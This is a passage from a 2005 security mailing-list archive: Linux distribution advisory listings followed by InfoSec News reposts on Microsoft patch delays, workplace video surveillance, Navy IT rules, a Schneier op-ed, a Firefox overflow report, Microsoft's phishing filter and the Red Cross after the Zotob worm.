http://www.linuxsecurity.com/content/view/120293 * Fedora Core 4 Update: lockdev-1.0.1-7.1 2nd, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120295 * Fedora Core 3 Update: perl-Compress-Zlib-1.37-1.fc3 6th, September, 2005 Some bug fixes so the amavis users stop complaining. =) http://www.linuxsecurity.com/content/view/120303 * Fedora Core 4 Update: perl-Compress-Zlib-1.37-1.fc4 6th, September, 2005 Some bug fixes so the amavis users stop complaining. =) http://www.linuxsecurity.com/content/view/120304 * Fedora Core 3 Update: perl-DBI-1.40-6.fc3 6th, September, 2005 Old and low priority security update that we forgot to push a while ago. http://www.linuxsecurity.com/content/view/120305 * Fedora Core 4 Update: termcap-5.4-6 6th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120306 * Fedora Core 4 Update: ckermit-8.0.211-3.FC4 6th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120307 * Fedora Core 4 Update: kdegraphics-3.4.2-0.fc4.2 6th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120308 * Fedora Core 4 Update: squid-2.5.STABLE9-8 6th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120315 * Fedora Core 3 Update: squid-2.5.STABLE9-1.FC3.7 6th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120316 * Fedora Core 4 Update: pam-0.79-9.5 6th, September, 2005 This update should fix potential problems with auditing in pam when used on systems with kernels without audit compiled in. http://www.linuxsecurity.com/content/view/120317 * Fedora Core 4 Update: setup-2.5.44-1.1 6th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120318 * Fedora Core 4 Update: tar-1.15.1-10.FC4 7th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120323 * Fedora Core 3 Update: openssh-3.9p1-8.0.3 7th, September, 2005 This security update fixes CAN-2005-2798 and resolves a problem with X forwarding binding only on IPv6 address on certain circumstances. http://www.linuxsecurity.com/content/view/120324 * Fedora Core 4 Update: tzdata-2005m-1.fc4 7th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120325 * Fedora Core 3 Update: tzdata-2005m-1.fc3 7th, September, 2005 Updated package. http://www.linuxsecurity.com/content/view/120326 * Fedora Core 4 Update: httpd-2.0.54-10.2 7th, September, 2005 This update includes two security fixes. An issue was discovered in mod_ssl where "SSLVerifyClient require" would not be honoured in location context if the virtual host had "SSLVerifyClient optional" configured (CAN-2005-2700). http://www.linuxsecurity.com/content/view/120327 * Fedora Core 3 Update: httpd-2.0.53-3.3 7th, September, 2005 This update includes two security fixes. An issue was discovered in mod_ssl where "SSLVerifyClientrequire" would not be honoured in location context if the virtual host had "SSLVerifyClient optional" configured (CAN-2005-2700). http://www.linuxsecurity.com/content/view/120328 +---------------------------------+ | Distribution: Gentoo | ----------------------------// +---------------------------------+ * Gentoo: MPlayer Heap overflow in ad_pcm.c 1st, September, 2005 A heap overflow in MPlayer might lead to the execution of arbitrary code. http://www.linuxsecurity.com/content/view/120276 * Gentoo: Gnumeric Heap overflow in the included PCRE library 3rd, September, 2005 Gnumeric is vulnerable to a heap overflow, possibly leading to the execution of arbitrary code. http://www.linuxsecurity.com/content/view/120296 * Gentoo: OpenTTD Format string vulnerabilities 5th, September, 2005 OpenTTD is vulnerable to format string vulnerabilities which may result in remote execution of arbitrary code. http://www.linuxsecurity.com/content/view/120301 * Gentoo: phpLDAPadmin Authentication bypass 6th, September, 2005 A flaw in phpLDAPadmin may allow attackers to bypass security restrictions and connect anonymously. http://www.linuxsecurity.com/content/view/120311 * Gentoo: Net-SNMP Insecure RPATH 6th, September, 2005 The Gentoo Net-SNMP package may provide Perl modules containing an insecure DT_RPATH, potentially allowing privilege escalation. http://www.linuxsecurity.com/content/view/120312 * Gentoo: Squid Denial of Service vulnerabilities 7th, September, 2005 Squid contains several bugs when handling certain malformed requests resulting in a Denial of Service. http://www.linuxsecurity.com/content/view/120322 +---------------------------------+ | Distribution: Red Hat | ----------------------------// +---------------------------------+ * RedHat: Important: httpd security update 6th, September, 2005 Updated Apache httpd packages that correct two security issues are now available for Red Hat Enterprise Linux 3 and 4. This update has been rated as having important security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120313 * RedHat: Low: cvs security update 6th, September, 2005 An updated cvs package that fixes a security bug is now available. This update has been rated as having low security impact by the Red Hat Security Response Team. http://www.linuxsecurity.com/content/view/120314 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email vuln-newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Sat Sep 10 00:07:43 2005 From: isn at c4i.org (InfoSec News) Date: Sat Sep 10 00:39:43 2005 Subject: [ISN] MS Patch Day: Can 1 Bulletin Hit the Spot? Message-ID: http://www.eweek.com/article2/0,1895,1856973,00.asp By Ryan Naraine September 8, 2005 Microsoft on Thursday announced plans to ship one security bulletin on Tuesday, Sept. 13, to provide patches for a "critical" flaw in its Windows operating system. As part of its advance notice mechanism, the Redmond, Wash.-based software giant said the security update will require a restart and can be detected with the MBSA (Microsoft Baseline Security Analyzer) tool. The solitary bulletin will give IT administrators a temporary respite from patching - especially after the clean-up from the recent Zotob worm attacks - but to many in the security research community, it underscores Microsoft Corp.'s sluggish approach to addressing known security vulnerabilities. eEye Digital Security, a private research firm with headquarters in Aliso Viejo, Calif., maintains a Web page of Upcoming Advisories that have been validated by software vendors. Next Tuesday, when Microsoft ships the Windows update, one of the eEye-discovered flaws will be 108 days overdue. eEye starts counting overdue days a full 60 days after a vulnerability has been "validated" by a software vendor, which means that Microsoft has been aware of the security hole for more than five and a half months. In all, eEye has reported nine vulnerabilities that have been validated by officials at the MSRC (Microsoft Security Response Center). Three of the nine flaws are more than two months overdue and all carry a "high severity" risk rating. Customers at risk include users of the widely deployed Internet Explorer browser, the Microsoft Outlook and Outlook Express mail clients, and various versions of Windows. "It's safe to assume that once we find a flaw, someone else will probably find it. The problem here is that someone malicious might find it and exploit it before Microsoft can provide full protection," said Steve Manzuik, product manager in eEye's research group. "There are some extremely smart hackers out there using and sharing the tools that find these vulnerabilities. When Microsoft takes a long time to issue fixes, it sets up a dangerous situation," Manzuik said in an interview with Ziff Davis Internet News. "This month, Microsoft is only issuing one patch and we already know it's not one of ours. That means that our overdue list will keep getting longer and longer," Manzuik added. eEye is not the only private research outfit finding and reporting vulnerabilities to Microsoft. Most companies do not keep a running tally of the flaws they report, and some keep the information under wraps until Microsoft ships the required update. "This all goes back to the responsible disclosure debate," said Thor Larholm, senior security researcher at PivX Solutions Inc., a Newport Beach, Calif.-based security consulting firm. "The longer it takes Microsoft to address a known vulnerability, the higher the probability that one of the 'bad guys' will find it and release the details to the public. Microsoft has a responsibility to get these fixes out quickly," Larholm said. Both Manzuik and Larholm acknowledged that Microsoft has improved significantly in its response to software security, but they argue that the company must find a way to avoid lengthy delays. "Microsoft is no longer the worst offender when it comes to sitting on patches. Oracle has taken that crown," Larholm said. "But I think there's still a culture at Microsoft that security is a PR issue that must be handled delicately. And that's a dangerous culture." "Overall, they have improved, there's no doubt about that. But unless they move faster on some of these high-impact vulnerabilities, we'll always deal with rogue researchers finding the same things," Manzuik said. Inevitably, zero-day exploits along with full details of the unpatched flaw are released on underground sites, putting millions of Microsoft customers at risk. "It would be really nice to see Microsoft turn around a patch in between 60 and 90 days. Considering the size of the company and the way some of these Internet-facing software [apps] are complicated, the 90-day window isn't that bad. But when it creeps up to three and four months, it becomes unacceptable," eEye's Manzuik said. A spokesperson for the MSRC said Microsoft is still testing the reported vulnerabilities, and that patch quality will take precedence over time. "Security response is a delicate balance of time and testing, and Microsoft will only issue an update when it has been fully tested and deemed a complete fix for the issue," the spokesperson said in an interview. "Microsoft has the ability to test on all platforms with a number of different tools and with the developers of each product. Microsoft is able to test more thoroughly than an independent researcher, and has a responsibility to get the update right. They will not compromise the accountability to customers," she added. From isn at c4i.org Mon Sep 12 02:21:39 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 12 02:28:06 2005 Subject: [ISN] Video Surveillance - The Hidden Camera Message-ID: Forwarded from: Mark Bernard Dear Associates, Employees do have a right to privacy and organizational policies cannot overly favour the company without providing a balance for employees. For example. While working with an international organization conducting policy compliance and penetration testing I measured compliance with a policy that granted employees the right to privacy. This policy stated that the top desk drawer of the employees cubical/office was designated as private and would never be searched (without a warrant). Additional assurances where given, included that monitoring would not be conducted in sensitive areas such as washrooms and changing rooms. Based on my extensive research of our Canadian Federal Privacy Commissionaire's investigation archives, many businesses have been brought into focus for the over use and misuse of digital surveillance equipment. For instance, in most cases involving the transportation industry investigations have resulted in the removal of surveillance camera(s). Most employee cases where based on the fact that the business was monitoring employee productivity and that surveillance camera had not helped to prevent theft, as the business had eluded to. All the best, Mark. ======= beginning of excerpt ========= http://www.csoonline.com/read/090105/hiddencamera_3824.html The Hidden Camera ...and other surveillance missteps can sour employees, threaten your success or get you sued. These six dos and don'ts will keep you in focus. By Todd Datz Drip.Drip.Drip. That's what caught the new employee's attention-water dripping from the ceiling of her office. Why was water leaking from the ceiling, she wondered? Taking a closer look, she didn't find the source of the leak. Much to her surprise, what she did find was a hidden camera. The company shouldn't have been too surprised when she filed a complaint. That juicy (in a Court TV kind of way) incident took place a couple of years ago, recounts an attorney whose firm defended the company after the woman filed a wrongful termination lawsuit (the complaint was raised as part of the suit; the attorney asked to remain anonymous). Why was a camera secreted in the ceiling? Turns out that the company, with the blessing of the HR director, had installed a camera in that particular office to deter a worker suspected of stealing. It was a nonworking (fake) camera and, originally, plainly visible. After that employee resigned, the company remodeled the office, covering (but not removing) the camera. Ultimately, the company argued that it was a nonworking camera; the suit was dismissed on other grounds. "If the camera had been working, it might have been a different outcome," says the attorney. CSOs have a lot of leeway when it comes to monitoring employees. After all, companies own the computers, telephones and electronic equipment their workers use, and have the well-established right to monitor their usage. The same is true for video surveillance-the legal system gives organizations the right to place cameras in every nook and cranny of their workplaces, with the exception of areas where employees have a reasonable expectation of privacy (bathrooms and locker rooms, for example). But many companies don't actually have a written policy in the employee handbook stating that the company has the right to freely monitor the workplace. In research conducted for this special report, 44 percent of respondents copped to having no official video surveillance policy (see additional results from the "CSO Surveillance and Monitoring Survey" on Page 28). And if companies aren't spelling out their surveillance posture now, then the picture promises more static than clarity in the near future. Digital, IP-based video systems are beginning to make a dent in the old-line hegemony of CCTV systems, and cameras are getting ever smaller, cheaper and more powerful. Inattentive CSOs are sitting on ever more threatening legal landmines. On the bright side, a little forethought can largely defuse those dangers. "It's not rocket science," says Miles Bielec, director of security operations at software giant SAS. "Security, in my view, is rooted solely in common sense." Below are six tips-some dos and don'ts that are indeed mostly common sense-that can help you navigate the current world of video surveillance and prepare for its rapid evolution, while avoiding any of the boneheaded moves that can undo in a heartbeat all the goodwill you've spent years building up. DO create a corporate surveillance policy. This is the numero uno, smartest step toward intelligent workplace surveillance, so it's a little surprising that so many organizations fail to do it. A video surveillance policy might state where cameras can be placed, as well as the fact that employees have no right to privacy in the general working areas of a facility. It should also make clear the disciplinary consequences that can result from unprofessional employee actions caught on video. "It should be short and sweet," says Jennifer Shaw, an employment lawyer and partner at Jackson Lewis in Sacramento, Calif. "A lot of employers go crazy being super-detailed when they don't need to be." Shaw advises her clients to write the policy into the employee handbook and to make sure employees have signed off on the handbook, acknowledging that they have read and understood it. One of the nice things a policy brings to the table is it shows that a company has a regular, standard practice around surveillance. That's something Connie Sadler, director of IT security at Brown University, thinks may be lacking at universities. She's heard of cases where supervisors have independently installed video cameras in buildings in response to thefts, some in not so obvious places. Installing cameras "willy-nilly," as she puts it, makes her uneasy. "The thing that concerns me is not really even whether they're used or how, but more what's our obligation to the community and employees in terms of what we tell them," she says. For example, should those supervisors have to ask permission to put up cameras? She also points out other gray areas: What if a student steals a laptop in a workspace such as one of the school libraries, and is caught on tape? "The student could say, 'I wasn't notified, there wasn't a policy,'" conjectures Sadler. Sadler would love to see consistent policies at universities. "I think people are looking for guidance. For so many things that are regulated, we look to industry standards, reasonable application. For video surveillance, I really don't see any reasonable standard." But the lack of consistent policies is not confined to the halls of academia. When asked to take a crack at estimating what percentage of companies have policies, Shaw figures only half-an estimate that roughly matches CSO's research. "More people are calling me wanting information about it. Some of the calls have been from employers who've been burned because they didn't have a policy in place," Shaw says. DON'T take a once-and-done approach to communication. When you've written a policy, don't be shy. Go ahead and shout it from the rooftops. Putting the policy in the handbook is a start, but only a start. (Here's an unshocking revelation: Not all employees read their handbooks.) Sure, you can take heart from the fact that the company is protected if an employee decides to sue for invasion of privacy, assuming that the cameras weren't filming anything off-limits. But why not remind employees of the policy periodically, so you can avoid any misunderstandings or ill will if employees for one reason or another feel like they're being watched inappropriately? Why wait for a potentially embarrassing and expensive lawsuit? Shaw believes that just communicating the fact that a company has a policy can act as a deterrent to potential wrongdoers. She cites three to four major retail clients with large distribution centers: "Once they announced their policies, theft went down because people knew [their companies] were watching." DO take the time to tell employees why you use cameras. This point goes beyond reminding workers that you have a policy, because a little bit of sensitivity can go a long way toward preventing employee resentment. Explaining the reason for the cameras has proven to be a critical step for Bielec at SAS. In 1993, the company built what's known as Building R on its Cary, N.C., campus. A security control center was located in the subbasement to monitor the new CCTV cameras that were being installed around the campus in lobbies, building entry points and the campus day care. (Before 1993, Bielec says, SAS's use of CCTV was minor.) Bielec was pleased. But he failed to anticipate the displeasure that spread its way through the employee ranks. Soon rumors started floating around that there were covert cameras. Questions arose: Why are they putting in cameras? What are they watching? Why do we need so much surveillance? When word started getting back to Bielec, "terror ran up and down my spine," he recalls. "I had done my best to develop a relationship with the employees," he says, but now he worried that he was about to take a giant step backwards. Bielec had an inspiration. Because two sides of the control center were glass, he decided to turn the monitor banks around, so that the monitor screens faced outward. With this change, any SAS employee walking by the control center can see exactly what the cameras are being used to observe. "I told employees, come on down, you can see what we're looking at. We can show you how [the system] works; we'll let you play with the joysticks," he says. "That alone allayed the monitoring fears." What Bielec came up against was a very open, creative corporate environment, not unlike that found on a college campus. To many employees, the installation of cameras screamed of Big Brother syndrome. Bielec assured employees that the system was more about customer service (such as letting employees back in the building if they accidentally got locked out during a smoking break), to give employees peace of mind and to keep an eye on more places than was otherwise humanly possible (data centers, for example). It was a good lesson for Bielec, one he fell back on recently. After a fire in the area of the loading dock outside SAS's production studio (a container of linseed-soaked rags ignited in the bed of a pickup truck), Bielec had installed a camera to monitor the racks where solvents are stored, intending to get a better chance of catching any accidental combustion early. The camera actually panned a little bit into the shop area, where workers built set pieces. The workers expressed some concern-they understood the need for the camera, but didn't want theirs to be the only work area under surveillance. So Bielec solved the problem by moving the camera 20 feet away, so that it looked only at the area where the flammable materials were stored. DON'T use dummy cameras without considering the risks. If cameras deter theft by their mere presence, CSOs may be tempted to nail up a few cameras that aren't activated. In CSO's survey, 23 percent of respondents said they include some fake or deactivated cameras as part of their surveillance practice. But are fake cameras worth the potential downsides? Douglas Durden, manager of safety, security and asset retention at Mallory Alexander International Logistics, thinks that often they are not. He believes fake cameras can impart a false sense of security. "Let's say someone is standing in front of what appears to be a camera. If a guy pulls a gun and takes a person's wallet, you should be able to pull it up on tape [but you can't]. Then you have to tell the person it was a fake camera," he says. Lawsuit, anyone? Walter Palmer, founder and principal of PCGsolutions, a retail loss-prevention consultancy, also advises caution. "One of the things you have to be careful of is, do you have an obligation to provide certain levels of security? If you don't have cameras and something occurs or you have dummy cameras, could you be liable for negligent security?" he asks. It depends on the circumstances, of course, but the short answer is yes. All things considered, Jackson Lewis's Shaw thinks, there are limited circumstances in which fake cameras are appropriate, but generally they do more harm than good. "They're a bad idea all around, in my opinion," she says. DO think long and hard before deploying hidden cameras. The rapid evolution of camera technology-smaller cameras, better resolution, cheaper prices-has made it easier for companies to gobble up more and more of them. But it also opens the door for more misuse of covert surveillance. Last November, nurses at Good Samaritan Hospital in Los Angeles were in a break room when, according to accounts, they spied a thin beam of light coming from a clock. They were shocked to discover a hidden camera with a tiny lens behind the number nine. The nurses immediately spread the word to their colleagues; eventually they discovered a total of 16 hidden cameras in the clocks of break rooms, a pharmacy and a fitness center, among other locations. In addition to the fact that the nurses hadn't been informed about the cameras, they were also upset because some of them changed their clothes in the break rooms. They felt that their right to privacy had been violated. In a press release, a California Nurses Association spokesperson said, "This is a pervasive problem throughout the hospital that is a disgraceful violation of the legal privacy rights of the RNs and reflects a deplorable attitude of the hospital administration towards its caregivers." Hospital officials defended their actions-they claimed the cameras were installed for security reasons, that it was standard practice in hospitals, that they had planned on informing the nurses and that the cameras hadn't been turned on. They also noted (see the first tip) that the nurses' employee handbook, which all must sign, states that surveillance might be used. Ultimately, the messy situation might have been avoided if hospital execs had informed the nurses of their plans beforehand, explained that the cameras were for their safety and made them overt instead of covert. By neglecting to inform the nurses until the cameras had been discovered, the hospital engendered suspicion and ill will among a core group of employees. There may still be a place for hidden cameras in a CSO's arsenal, of course. It just makes sense to deploy them wisely. DON'T overlook the special complications of a union workforce. Union employees have certain contractual rights that nonunion employees may lack. CSOs with unions in the workplace will need to review National Labor Relations Board (NLRB) rulings specifically concerning video surveillance. For example, the NLRB decided in the 1997 case Colgate-Palmolive Co. that the installation of hidden cameras is a mandatory subject of bargaining. (An employee had found a camera hidden in an air vent in a men's restroom.) That decision was reinforced in 2003 by a federal appeals court in National Steel Corp. v. NLRB. (The company had placed a hidden camera in a manager's office to catch the person who was making long-distance phone calls at night.) More recently, in July the U.S. Court of Appeals for the District of Columbia Circuit upheld a 2004 NLRB decision in a case involving Anheuser-Busch. In 1998, the king of beers had installed hidden cameras in work and break areas in one of its St. Louis facilities. Sixteen employees were later disciplined (five were fired) after being caught on tape taking lengthy breaks, sleeping, smoking pot and urinating on a rooftop. The court supported the NLRB, which had previously ruled that Anheuser-Busch was at fault for not giving notice to the union before installing the cameras (although the NLRB had also ruled that the workers were not entitled to back pay or reinstatement). The court sent the case back to the NLRB to determine whether the workers were entitled to any remedies. CSOs should also be mindful that any introduction of surveillance into the workplace could be cause for a union grievance, according to the Labor Research Association. A report titled "Employer Snooping: What Rights Do Workers Really Have?" says "When a company seeks to introduce video surveillance, monitor e-mail, conduct random searches or other workplace surveillance policies, it is attempting to change working conditions, according to the NLRB. As a result, the terms of these policies are considered a 'mandatory subject' of collective bargaining and must be negotiated with the workers' union." It goes on to cite some examples of what a employer and union might negotiate, including allowing workers to defend themselves against accusations and agreeing that nonwork areas remain camera-free. As technology progresses, bringing with it the ability to monitor the workplace more cheaply and easily than ever before, there's a concomitant increase in the chance that things can get messy. Taking the time to understand all the issues-to manage your surveillance risks-will ensure that your surveillance posture is no slouch. ======= end of excerpt ============= Best regards, Mark. Mark E. S. Bernard, CISM, CISSP, PM, Principal, Risk Management Services, e-mail: Mark.Bernard@TechSecure.ca Web: http://www.TechSecure.ca Phone: (506) 325-0444 Leadership Quotes by Warren Bennis: "The manager asks how and when; the leader asks what and why?" From isn at c4i.org Mon Sep 12 02:23:12 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 12 02:29:23 2005 Subject: [ISN] Navy: Don't access personal e-mail at work Message-ID: http://www.fcw.com/article90710-09-09-05-Web By Frank Tiboni Sept. 9, 2005 Navy employees can no longer access personal e-mail accounts, including Yahoo Mail and Microsoft Hotmail, from the service?s networks without approval. That is one of six rules in the Navy's new acceptable use of information technology policy issued in July. The "Effective Use of Department of Navy IT Resources," states that the service's military, civilian and contractor users cannot: * Automatically forward official Navy e-mail to a commercial account or use a commercial account for official government business without approval. * Install or modify computer hardware or software without approval. * Circumvent or disable security measures, countermeasures or safeguards, such as firewalls, content filters and antivirus programs. * Participate in or contribute to activity that causes a disruption or denial of service. * Write, code, compile, store, transmit, transfer or introduce malicious software, programs or code. * Use peer-to-peer (P2P) file sharing applications, such as Kazaa, Shareaza and OpenP2P without approval and only in support of Navy missions. "This policy is intended to promote effective and secure use of IT resources within the Department of the Navy and is an integral part of the department's information assurance efforts," according to the policy released by the Navy Department's Chief Information Officer's Office. The policy especially called attention to the dangers of P2P applications, software that permits users to share files including music and pictures with other users without centralized security controls or oversight. "Unauthorized use of P2P file-sharing can result in significant vulnerabilities to Department of the Navy information systems including unauthorized access to information, compromise of network configurations and denial-of-service," according to the policy. Some Navy employees do not know they should no longer access personal e-mail at work. However, The Periscope, a publication of the Navy's submarine base at Kings Bay, Ga., published a story Sept. 8 about the service's new IT policy. From isn at c4i.org Mon Sep 12 02:22:57 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 12 02:30:28 2005 Subject: [ISN] Bruce Schneier: Toward a truly safer nation Message-ID: http://www.startribune.com/stories/562/5606306.html Bruce Schneier September 11, 2005 Leaving aside the political posturing and the finger-pointing, how did our nation mishandle Katrina so badly? After spending tens of billions of dollars on homeland security (hundreds of billions, if you include the war in Iraq) in the four years after 9/11, what did we do wrong? Why were there so many failures at the local, state and federal levels? These are reasonable questions. Katrina was a natural disaster and not a terrorist attack, but that only matters before the event. Large-scale terrorist attacks and natural disasters differ in cause, but they're very similar in aftermath. And one can easily imagine a Katrina-like aftermath to a terrorist attack, especially one involving nuclear, biological or chemical weapons. Improving our disaster response was discussed in the months after 9/11. We were going to give money to local governments to fund first responders. We established the Department of Homeland Security to streamline the chains of command and facilitate efficient and effective response. The problem is that we all got caught up in "movie-plot threats," specific attack scenarios that capture the imagination and then the dollars. Whether it's terrorists with box cutters or bombs in their shoes, we fear what we can imagine. We're searching backpacks in the subways of New York, because this year's movie plot is based on a terrorist bombing in the London subways. Funding security based on movie plots looks good on television, and gets people reelected. But there are millions of possible scenarios, and we're going to guess wrong. The billions spent defending airlines are wasted if the terrorists bomb crowded shopping malls instead. Our nation needs to spend its homeland security dollars on two things: intelligence-gathering and emergency response. These two things will help us regardless of what the terrorists are plotting, and the second helps both against terrorist attacks and national disasters. Katrina demonstrated that we haven't invested enough in emergency response. New Orleans police officers couldn't talk with each other after power outages shut down their primary communications system -- and there was no backup. The Department of Homeland Security, which was established in order to centralize federal response in a situation like this, couldn't figure out who was in charge or what to do, and actively obstructed aid by others. FEMA did no better, and thousands died while turf battles were being fought. Our government's ineptitude in the aftermath of Katrina demonstrates how little we're getting for all our security spending. It's unconscionable that we're wasting our money fingerprinting foreigners, profiling airline passengers, and invading foreign countries while emergency response at home goes underfunded. Money spent on emergency response makes us safer, regardless of what the next disaster is, whether terrorist-made or natural. This includes good communications on the ground, good coordination up the command chain, and resources -- people and supplies -- that can be quickly deployed wherever they're needed. Similarly, money spent on intelligence-gathering makes us safer, regardless of what the next disaster is. Against terrorism, that includes the NSA and the CIA. Against natural disasters, that includes the National Weather Service and the National Earthquake Information Center. Katrina deftly illustrated homeland security's biggest challenge: guessing correctly. The solution is to fund security that doesn't rely on guessing. Defending against movie plots doesn't make us appreciably safer. Emergency response does. It lessens the damage and suffering caused by disasters, whether man-made, like 9/11, or nature-made, like Katrina. -=- Bruce Schneier is the author of "Beyond Fear: Thinking Sensibly About Security in an Uncertain World." He can be reached at www.schneier.com From isn at c4i.org Mon Sep 12 02:23:23 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 12 02:31:08 2005 Subject: [ISN] Firefox flaw found: Remote exploit possible Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,104504,00.html By Peter Sayer SEPTEMBER 09, 2005 IDG NEWS SERVICE Computers running the Firefox browser could be open to remote attack as a result of a buffer overflow vulnerability reported today by security researcher Tom Ferris. Vulnerable versions of Firefox include all those up to 1.06, and even the just-released Version 1.5 Beta 1 (Deer Park Alpha 2), Ferris wrote in a posting to his Web site, Security Protocols, and to the Full Disclosure security mailing list just after 1 a.m. EDT today. Ferris said he reported the bug to staff at the Mozilla Foundation, the organization behind the Firefox browsers, on Sept. 4, but had no idea whether the foundation is working on a fix for the problem. The problem is caused by a bug in the code Firefox uses to process HTML links in Web pages, Ferris said. Links pointing to a host with a long name composed entirely of dashes can be crafted so that Firefox will execute arbitrary code of an attacker's choosing. Mozilla officials said today that they learned of the issue on Tuesday and are already working on a patch. "We have a preliminary patch for part of the problem, and are in the process of developing a comprehensive solution that will appear in a upcoming release," said Michael Schroepfer, Mozilla's head of engineering. He was not sure when the patch would be released. Last month, Ferris reported a critical flaw in fully patched versions of Microsoft Corp.'s Internet Explorer 6 running on Windows XP Service Pack 2. The flaw was acknowledged by Microsoft, but in that instance, Ferris did not reveal any details of the flaw or how it could be exploited. -=- Computerworld's Sharon Machlis and Todd Weiss contributed to this report. From isn at c4i.org Mon Sep 12 02:22:24 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 12 02:31:38 2005 Subject: [ISN] Security consortium offers C&A credential Message-ID: Forwarded from: matthew patton > Consortium officials said that W. Hord Tipton, chief information > officer at the Interior Department, and Jane Scott Norris, chief > information security officer at the State Department, were in the > first group who passed the CAP exam. Anybody find the mention of the 2 guys here something bordering on "damning by faint praise"? Wasn't it the Dept of Interior who has had certain parts of it's networks forcibly cut off by court order several times now for rampant security failure? The State Department isn't exactly known for their track record in this space either. From isn at c4i.org Mon Sep 12 02:22:42 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 12 02:33:00 2005 Subject: [ISN] Microsoft to track internet use Message-ID: http://www.theage.com.au/news/technology/microsoft-to-track-internet-use/2005/09/08/1125772633503.html Washington September 9, 2005 Microsoft Corp will soon release a security tool for its internet browser that privacy advocates say could allow the company to track the surfing habits of computer users. Microsoft officials say the company has no intention of doing so. The new feature, which Microsoft will make available as a free download within the next few weeks, is prompting some controversy, as it will inform the company of websites that users are visiting. The browser tool is being called a Phishing Filter. It is designed to warn computer users about "phishing," an online identity theft scam. The Federal Trade Commission estimates that about 10 million Americans were victims of identity theft in 2005, costing the economy $US52.6 billion ($A69.11 billion). But privacy groups are already raising questions about how this feature will work, and some computer security experts are questioning whether it will be effective. Phishing fraud normally begins when computer users receive emails appearing to be from banks, eBay or credit card companies requesting account updates. Links are provided to websites that seem legitimate. Unwary users are then duped into giving up their Social Security, credit card and banking account information. In an effort to protect internet users, Microsoft's anti-phishing tool is designed to verify the safety of every website, and to issue warnings if users encounter a suspected or known phishing site. It will use a three-step process. First, the browser will automatically compare the address of every website a user visits to a list of sites Microsoft has verified to be legitimate. This list will be kept on users' computers. If no match is found, the Phishing Filter will send the address to Microsoft where it will be compared to a list of known phishing sites that the company intends to update every 20 minutes. A match will trigger a warning that will pop up within the browser. Finally, if no match is found at Microsoft, a sophisticated filter built into the browser will compare characteristics of the suspect website to characteristics common to phishing sites. Under some circumstances, this too could trigger an alert to appear. Privacy advocates were surprised to learn that Microsoft would be using this method in an effort to protect its customers. Kevin Bankston, a lawyer and internet privacy expert with the San Francisco-based Electronic Frontier Foundation, worries that this is potentially "a wholesale handing over of one's privacy to Microsoft. I would say, right now, definitely don't use this. If you're careful, you don't need this." The filter is designed as an opt-in feature. The first time computer users attempt to visit a website that is not included on the list of "legitimate" websites, they will be asked whether they wish to enable the Phishing Filter. Users will also be presented with the following on-screen notice, "website addresses will be sent to Microsoft to be checked against a list of reported phishing web sites. Information received will not be used to personally identify you." Users also have the option of turning the filter off. What happens to data? Microsoft officials say the company has no plans to retain information contained in those queries, which company officials say will be encrypted and limited to the domain and path of the website being called. "We don't store that information," said Greg Sullivan, Microsoft Windows group product manager. "There is no server event log, no data base, no hosted event file." But Bankston said the information may be too valuable for the company to ignore in the long run. "There are clear financial imperatives for them to choose to make use of this information in the future and start logging it," he said. "It is not hard to imagine the gold that could be mined out of that information." What is unclear is just how frequently website addresses will be sent to Microsoft. The answer appears to depend, in part, upon how often consumers surf to sites contained in the list of legitimate websites as opposed to sites not on that list. Microsoft officials say the list of approved sites, which they are referring to as "the list of highly trafficked legitimate websites," will number in the "tens of thousands." Company officials declined to provide an exact number. Michael Aldridge, a product planner with Microsoft's technology care and safety group, said the company would not be vetting which websites are contained on the list. "It is based ... purely on traffic. We make no judgments on content." That list is being provided by Nielsen NetRatings, which measures internet traffic. Tracy Yen, a company official, also declined to provide the number of names on the list. ICANN, the internet Corporation for Assigned Names And Numbers, reported in August that there are 43 million active registered domain names worldwide. Todd Bransford, vice-president of marketing with internet security firm Cyveillance, referred to the Nielsen list to be used by Microsoft as a "complete drop in the bucket." Bransford said he believes that most internet surfing will ultimately prove to be to sites not on the Microsoft list. That would mean those users who opt in will be sending a majority of their surfing locations to Microsoft. He said the Microsoft Phishing Filter may prove ineffective and could provide a false sense of security for many users. "Phishers are evolving very quickly," he said, "and making sites look different. So with this approach you have a problem where the technology may not know what a phishing site looks like. It may miss a lot of stuff." A further concern is that since the list of legitimate websites is limited, the Phishing Filter may mistakenly identify numerous safe sites as phishing sites. "That's definitely a worry," according to Bankston. Microsoft officials say the Phishing Filter will contain an error reporting link, allowing business and users to quickly inform the company of any errors. From isn at c4i.org Tue Sep 13 02:41:08 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:49:42 2005 Subject: [ISN] Red Cross Works to Better Protect Its Networks From Attacks, Scams Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,104539,00.html By Jaikumar Vijayan SEPTEMBER 12, 2005 COMPUTERWORLD Information security staffers at the American Red Cross, which was hit last month by the Zotob worm, are working overtime to try to protect the organization's networks against attacks amid surges in usage of the networks following Hurricane Katrina. In addition, the emergency relief agency has turned to the FBI and others for help in preventing the spread of imitation Red Cross Web sites set up by scam artists. "The infrastructure is stretched, and I'm not sure we can tolerate another outbreak" like the Zotob attack, said Ron Baklarz, the Washington-based organization's chief information security officer. Zotob, which took advantage of a hole in the plug-and-play component in Microsoft Corp.'s Windows software, "saturated" sections of the Red Cross' networks, making them inaccessible to users for several hours last month, Baklarz said. Consequently, the organization turned to security experts to "take a second look at the security technologies we have in place today to ensure that we have tuned them as best as we can under the increased load," he said. The Red Cross is implementing new technologies such as intrusion-detection and -prevention systems -- some of them donated by vendors -- to 